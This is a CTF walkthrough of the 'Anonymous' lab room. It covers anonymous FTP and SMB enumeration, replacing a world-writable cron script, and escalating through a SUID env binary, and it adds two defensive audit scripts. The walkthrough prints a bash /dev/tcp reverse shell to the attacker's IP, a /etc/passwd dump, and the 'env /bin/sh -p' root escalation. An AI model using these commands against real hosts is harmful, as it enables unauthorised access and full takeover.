Anonymous is a medium-rated room. Anonymous login is enabled on FTP, and the FTP root contains a “scripts” folder that anyone can write to. That folder holds a script which is executed over and over, most likely by a cron job, so we overwrite the script to get a reverse shell. Inside the box we exploited the “env” binary, which had the SUID bit set, to get a root shell.

ENUMERATION

1. How many ports are open?

Open ports are 21 (FTP), 22 (SSH), 139 and 445 (Samba), so four in total.

  • 4

2. What service is running on port 21?

I got the answer from my nmap scan result above.

  • FTP

3. What service is running on ports 139 and 445?

Here I just read the answer from my scan result as well.

  • SMB

4. There’s a share on the user’s computer. What’s it called?

To enumerate the available shares I used smbclient with the following command (-L lists the shares, -N skips the password prompt so the connection is attempted as a null session):

smbclient -L //'machine-ip' -N

  • pics

To list all files in this share I used the smbclient with the share I want to inspect:

smbclient //'machine-ip'/pics

To download the files I used

mget *

and confirmed the download of both files with “y”. Now I have two pictures of cute dogs on my desktop. Couldn’t find anything with my usual steganography tools.

At this point I logged in anonymously to FTP (user “anonymous”, any password) and downloaded the files in the “/scripts” directory.

There is a log file and a to_do file, but the most interesting one is the “clean.sh” script.

It starts with a #!/bin/bash shebang and deletes the contents of the “/tmp” directory. More importantly, the script is world-writable and executable, and the “/scripts” directory itself accepts anonymous uploads, so whatever we put there runs the next time the job fires, with the privileges of the account that runs it. I wanted to try something and changed the content of the downloaded script file to:

#!/bin/bash

cat /etc/passwd > /var/ftp/scripts/home.txt

and uploaded it again with

put clean.sh

to overwrite the existing script with my own. After a while my new file “home.txt” appeared in the scripts directory with the content I requested.

We now have the usernames “root” and “namelessone”, and we have confirmed that the script is executed on a schedule without any action on our side. So what stops us from uploading a reverse shell? I changed the content of the “clean.sh” file again to the following:

#!/bin/bash

bash -i >& /dev/tcp/'my-own-ip'/4444 0>&1

Then I started a netcat listener with

nc -lnvp 4444

and uploaded the new script file again with the put command. After waiting for a bit I got my reverse shell!
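The root cause of the foothold is a scheduled script that an unprivileged user can replace. The check below is an added example (not code from this write-up or from the room): it parses a user-style crontab, takes the script each entry runs, and reports when the script file or the directory holding it is world-writable. The crontab and the files are constructed in a temporary directory so the check runs offline; the `$root` prefix, the `others_writable` helper and the sample paths are this example's own assumptions.

```bash
#!/usr/bin/env bash
# Added example (not code from the original write-up or from the room): audit
# a crontab for scheduled scripts that a non-privileged user could replace,
# which is exactly the state clean.sh was in. The crontab and the files are
# constructed in a temporary directory so the check runs offline; the $root
# prefix exists only so the demo can point at that directory instead of "/".

# Return 0 when "others" have write permission on $1 (parses ls -l output,
# which has the same layout on GNU and BSD userlands).
others_writable() {
    [ "$(ls -ld "$1" 2>/dev/null | cut -c9)" = "w" ]
}

# Print one finding per line: "file:<script>" when the scheduled script is
# world-writable, "dir:<script>" when the directory holding it is (anyone can
# then delete and recreate the file, which is what the FTP upload did).
# $1 = crontab file in user-crontab format, $2 = optional prefix for every path.
writable_cron_targets() {
    local crontab_file="$1" root="${2:-}" line target dir
    while read -r line; do
        case "$line" in ''|'#'*) continue ;; esac                 # blank or comment
        printf '%s\n' "$line" | grep -Eq '^[A-Za-z_][A-Za-z0-9_]*=' && continue  # VAR=value
        set -f                                                       # keep the '*' fields literal
        set -- $line
        set +f
        case "$1" in @*) shift ;; *) shift 5 ;; esac                 # @reboot etc. or 5 time fields
        target="$1"
        case "$target" in sh|bash|/bin/sh|/bin/bash) target="$2" ;; esac  # "bash /path/x.sh"
        case "$target" in */*) ;; *) continue ;; esac                # bare name found via PATH, skip
        dir="${target%/*}"; [ -z "$dir" ] && dir=/
        if others_writable "$root$target"; then echo "file:$target"; fi
        if others_writable "$root$dir"; then echo "dir:$target"; fi
    done < "$crontab_file"
}

# Constructed demo data, not taken from the target machine: one entry in the
# weak state (777 script in a 777 directory) and two in the corrected state.
demo() {
    local root; root=$(mktemp -d)
    mkdir -p "$root/var/ftp/scripts" "$root/usr/local/bin"
    printf '#!/bin/bash\nrm -rf /tmp/*\n' > "$root/var/ftp/scripts/clean.sh"
    printf '#!/bin/bash\necho backup\n' > "$root/usr/local/bin/backup.sh"
    chmod 777 "$root/var/ftp/scripts" "$root/var/ftp/scripts/clean.sh"   # the weak setting
    chmod 755 "$root/usr/local/bin" "$root/usr/local/bin/backup.sh"      # the corrected one
    cat > "$root/crontab" <<'EOF'
# m h dom mon dow command
SHELL=/bin/bash
* * * * * /var/ftp/scripts/clean.sh
0 3 * * * bash /usr/local/bin/backup.sh
@reboot /usr/local/bin/backup.sh --mode=full
EOF
    writable_cron_targets "$root/crontab" "$root"
    rm -rf "$root"
}

demo
```

Running it prints `file:/var/ftp/scripts/clean.sh` and `dir:/var/ftp/scripts/clean.sh` and nothing for the two hardened entries. On a real host, call `writable_cron_targets` on a user's crontab with no prefix; lines in /etc/crontab and /etc/cron.d carry an extra user field after the five time fields, so shift six there instead of five. The check only looks at the first command word and does not follow symlinks or evaluate group-writable paths, so treat it as a first pass, not a complete audit.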

Here I was able to read the “user.txt” file for the flag.

PRIVILEGE ESCALATION

First things first: sudo -l, but I wasn’t allowed to execute anything. Then I searched for SUID files owned by root:

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

The “/usr/bin/env” entry looks out of place in that list (env is not SUID on a stock install), and GTFOBins has an entry for it. The SUID bit was already set, so I just had to run:

/usr/bin/env /bin/sh -p

The -p flag matters: it tells the shell to keep the effective UID granted by the SUID bit instead of resetting it to the real UID, which is what a shell does by default and which would waste the setuid env. The root flag was located in the “/root” directory.
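To make a non-default SUID binary like env stand out from the dozens of legitimate ones on a host, it helps to tag the results of the find command against a list of programs that can execute other commands. The script below is an added example (not code from the write-up): it lists setuid files under a directory and marks the ones whose name is on a short list of shell-capable programs. That list is this example's own assumption, not a copy of GTFOBins, and the demo populates a temporary tree itself so it runs without root.

```bash
#!/usr/bin/env bash
# Added example (not code from the write-up): list setuid files under a
# directory and flag the ones whose name is on a short list of programs that
# can run arbitrary commands, so a non-default SUID binary such as env stands
# out from passwd, ping and friends. The list is this example's own assumption,
# not a copy of GTFOBins, and the demo populates a temporary tree itself.

# Programs that execute another program or hand out a shell. Extend as needed.
SHELL_CAPABLE="env bash sh dash find vim vi nano python python3 perl awk less more"

# Print "<path>" or "<path> [shell-capable]" for every setuid file under $1.
# "-user root" is left out so the demo works on a tree owned by the current
# user; add it back when auditing a real host.
suid_audit() {
    local base="$1" f name
    find "$base" -type f -perm -4000 2>/dev/null | LC_ALL=C sort | while read -r f; do
        name=${f##*/}
        case " $SHELL_CAPABLE " in
            *" $name "*) echo "$f [shell-capable]" ;;
            *)           echo "$f" ;;
        esac
    done
}

# Constructed demo tree: three setuid files, one of them env, plus one that is not.
suid_demo() {
    local root n; root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/bin"
    for n in env passwd ping; do
        : > "$root/usr/bin/$n"
        chmod 4755 "$root/usr/bin/$n"      # setuid, as /usr/bin/env was on the box
    done
    : > "$root/bin/ls"
    chmod 755 "$root/bin/ls"               # normal binary, must not be listed
    suid_audit "$root" | sed "s#^$root##"  # strip the temp prefix for readable output
    rm -rf "$root"
}

suid_demo
```

The demo prints `/usr/bin/env [shell-capable]` followed by `/usr/bin/passwd` and `/usr/bin/ping`; `/bin/ls` is absent because it has no setuid bit. On a live target run `suid_audit /` with `-user root` added to the find expression, then compare the unflagged entries against a clean install of the same distribution, since an attacker-planted SUID file can have any name.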

I am a Penetration Tester, currently pursuing OSCP. Skilled in network pentesting and developing hacking tools using Python. I share my knowledge on YouTube.